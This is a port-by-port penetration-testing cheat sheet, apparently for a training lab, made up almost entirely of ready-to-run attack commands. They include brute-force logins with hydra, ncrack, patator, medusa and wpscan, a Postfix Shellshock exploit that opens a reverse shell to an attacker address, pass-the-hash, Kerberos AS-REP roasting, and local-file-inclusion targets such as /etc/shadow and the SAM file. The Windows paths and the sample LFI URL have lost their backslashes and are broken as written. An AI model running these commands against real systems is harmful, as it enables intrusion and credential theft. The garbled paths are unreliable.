Ports and Explanations
These are the most common ports found in scans…
The following lists number, use, and effective enumeration tools…
PORTS QUICK REFERENCE (DESKTOP BROWSER)
-----------------------------------------------------------------------------
- FIND AVAILABLE NETWORK CONNECTIONS
nmap -sn -oG results.txt 10.X.X.0/24
-----------------------------------------------------------------------------
21 - FTP
Try anonymous logins
-----------------------------------------------------------------------------
25 - SMTP (EMAIL)
telnet 10.11.1.72 25
VRFY user
FINISH SESSION: Ctl + ] / close
VULN - SHELLSHOCK - need valid email address
python2 postfix-shellshock-nc.py <ip> <email> LHOST LPORT
110 - POP
143 - IMAP
587 - SECURE EMAIL
nc -nv 10.11.1.72 25
nc -nvC 10.11.1.72 110
USER enter-user
PASS enter-pass
-----------------------------------------------------------------------------
80 / 443 - WEB
dirb / dirbuster / gobuster / nikto / curl
RFI / LFI / SQLI
-----------------------------------------------------------------------------
88 / 464 - KERBEROS
pth-winexe -U WORKGROUP/User%Pass //10.11.1.220 cmd.exe
-----------------------------------------------------------------------------
111 - NFS mounts (showmount -a / -e)
-----------------------------------------------------------------------------
135 - RPC: Remote Procedure Call
impacket-rpcdump
-----------------------------------------------------------------------------
139 / 445 - SMB (smbmap -H / smbclient -L / nmblookup -A / nbtscan)
nmap --script nbstat.nse <ip>
nmap --script smb-os-discovery <ip>
nmap --script smb-enum-shares -p139,445 <ip>
nmap --script smb-vuln* <ip>
'net' command on kali
crackmapexec smb -u -p
rpcclient -U '' -N
impacket-lookupsid
enum4linux
---------------------------------------------------------------
CIFS (OLD WIND NT 4.0)
SMB 1.0 / SMB1 - WIN2K / WINXP / WIN SRV 2003 WIN SRV 2003 R2
SMB 2.0 / SMB2 - WIN VISTA / WIN SRV 2008
SMB 2.1 / SMB2.1 - WIN 7 / WIN SRV 2008 R2
SMB 3.0 / SMB3 - WIN 8 / WIN SRV 2012
SMB 3.02 / SMB3 - WIN 8.1 / WIN SRV 2012 R2
SMB 3.1 / SMB 3.1.1 (SECURE NEGOTIATION) - WIN SRV 2016 / WIN 10
-----------------------------------------------------------------------------
1433 - MSSQL
nmap --script ms-sql* -p1433
sqsh -S 10.11.1.31 -U sa
-----------------------------------------------------------------------------
389 / 3268 - LDAP (INDICATOR OF DC)
nmap -sT -Pn -n --open <ip> -p389 --script ldap-rootdse
nmap -p 389 --script ldap-search <ip>
dig srv _ldap._tcp.dc._msdcs.<FULL-DOMAIN-NAME> @10.11.1.220
impacket-GetNPUsers thinc/10.11.1.220 -dc-ip 10.11.1.220 -request
-----------------------------------------------------------------------------
3389 - RDP
rdesktop -u <user> -p <pass> <host>
-----------------------------------------------------------------------------
5985 / 5986 - WINRM
evil-winrm -u <user> -p <pass> -i <host>
-----------------------------------------------------------------------------
NMAP QUICK SEARCH
nmap -sn -oG results.txt 10.X.X.0/24
FTP
PORT 21
…simply use “anonymous” with no password to start, then enumerate
ftp ip
user: anonymous
pass: <just hit enter>
hydra -L users.txt -P passwords.txt ftp://10.10.1.299
ncrack -U users.txt -P passwords.txt ftp://10.10.1.299
patator ftp_login host=10.10.1.299 user=FILE0 password=FILE1 0=users.txt 1=passwords.txt
EMAIL
PORT 25 – SMTP
telnet ip 25
VRFY user
Ctl + ] # THIS IS TO CLOSE YOUR SESSION
…possible attack vector is SHELLSHOCK
python2 postfix-shellshock-nc.py LHOST LPORT
# MAY REQUIRE A VALID EMAIL ADDRESS
python2 postfix-shellshock-nc.py 10.10.1.229 [email protected] 192.168.119.229 443
PORT 110 – POP
PORT 143 – IMAP
PORT 587 – SECURE EMAIL
nc -nv 10.11.1.72 25
nc -nvC 10.11.1.72 110
USER enter-user
PASS enter-pass
WEB
PORT 80
PORT 443
…web server ports
…multiple attack vectors
dirb http://10.10.1.299
dirb http://10.10.1.299 -P 10.10.1.299:8080 -o file.txt # USED TO SCAN OTHER PORTS
dirbuster. # GUI USED TO ENUMERATE
gobuster dir -u http://10.10.1.299:8080 -w /usr/share/wordlists/dirb/big.txt
medusa -h 10.10.1.299 -u admin -P rockyou.txt -M http -m DIR:/admin
REMOTE FILE INCLUSION
LOCAL FILE INCLUSION
SQL INJECTION
# WordPress Enumeration if found
wpscan --url http://10.10.1.299 --passwords /usr/share/wordlists/rockyou.txt --usernames admin
[!] Valid Combinations Found:
| Username: admin, Password: password
…for LFI, you can look for very common files on a system
https://insecure-website.com/loadImage?filename=......windowswin.ini
WINDOWS
C:windowswin.ini
C:windowssystem.ini
C:windowsiis.log
C:windowsSystem32Driversetchosts
C:Windowssystem32configSYSTEM
C:windowsdebugnetsetup.log
C:windowsdebugsammui.log
C:windowsdebugnetlogon.log
C:windowsdebugpasswd.log
C:windowssystem32winevtlogssystem.evtx
C:windowssystem32winevtlogsWindows Powershell.evtx
C:windowsWindowsUpdate.log
C:windowssystem32calc.exe
C:windowssystem32windowspowershellv1.0powershell.exe
C:windowsccmlogsfilesystemfile.log
C:usersadministratorappdatalocalrecently-used.xbel
C:usersadministratordesktopdesktop.ini
C:windowspantherunattended.xml
C:windowspantherunattendedunattended.xml
C:windowsrepairsam
C:windowssystem32tasksdaily
C:windowspanthersysprep.inf
LINUX
/etc/passwd
/etc/shadow
/etc/crontab
KERBEROS – WINDOWS ENVIRONMENTS
PORT 88
PORT 464
…pass the hash is a common vector
…credentials must be known
pth-winexe -U WORKGROUP/User%Pass //10.10.1.299 cmd.exe
NETWORK FILE SYSTEM (NFS)
PORT 111
…you’re looking for shared drives
showmount -a
showmount -e
REMOTE PROCEDURE CALL (RPC)
PORT 135
…can reveal information about a system
…usually shows installed programs / modules
impacket-rpcdump ip
SAMBA (SMB)
PORT 139
PORT 445
…multiple enumeration techniques are available
…different versions will require different attack vectors
nmap --script nbstat.nse
nmap --script smb-os-discovery
nmap --script smb-enum-shares -p139,445
nmap --script smb-vuln*
'net' command on kali
crackmapexec smb -u -p
rpcclient -U '' -N
impacket-lookupsid
enum4linux
…it’s important to note Samba versions
CIFS (OLD WIND NT 4.0)
SMB 1.0 / SMB1 - WIN2K / WINXP / WIN SRV 2003 WIN SRV 2003 R2
SMB 2.0 / SMB2 - WIN VISTA / WIN SRV 2008
SMB 2.1 / SMB2.1 - WIN 7 / WIN SRV 2008 R2
SMB 3.0 / SMB3 - WIN 8 / WIN SRV 2012
SMB 3.02 / SMB3 - WIN 8.1 / WIN SRV 2012 R2
SMB 3.1 / SMB 3.1.1 (SECURE NEGOTIATION) - WIN SRV 2016 / WIN 10
MICROSOFT SQL (MSSQL)
PORT 1433
…try to scan and connect
…the ‘sa’ account is usually an admin account
nmap --script ms-sql* -p1433
sqsh -S 10.10.1.299 -U sa
LIGHTWEIGHT DIRECTORY ACCESS PROTOCOL (LDAP)
PORT 389
PORT 3268
…very useful to Active Directory environment enumeration
nmap -sT -Pn -n --open -p389 --script ldap-rootdse
nmap -p 389 --script ldap-search
dig srv _ldap._tcp.dc._msdcs. @10.10.1.299
impacket-GetNPUsers domain/10.10.1.299 -dc-ip 10.10.1.299 -request
REMOTE DESKTOP PROTOCOL (RDP)
PORT 3389
…connection requires credentials
rdesktop -u -p
WINDOWS REMOTE MANAGEMENT (WINRM)
PORT 5985
PORT 5986
…connection requires credentials
evil-winrm -u -p -i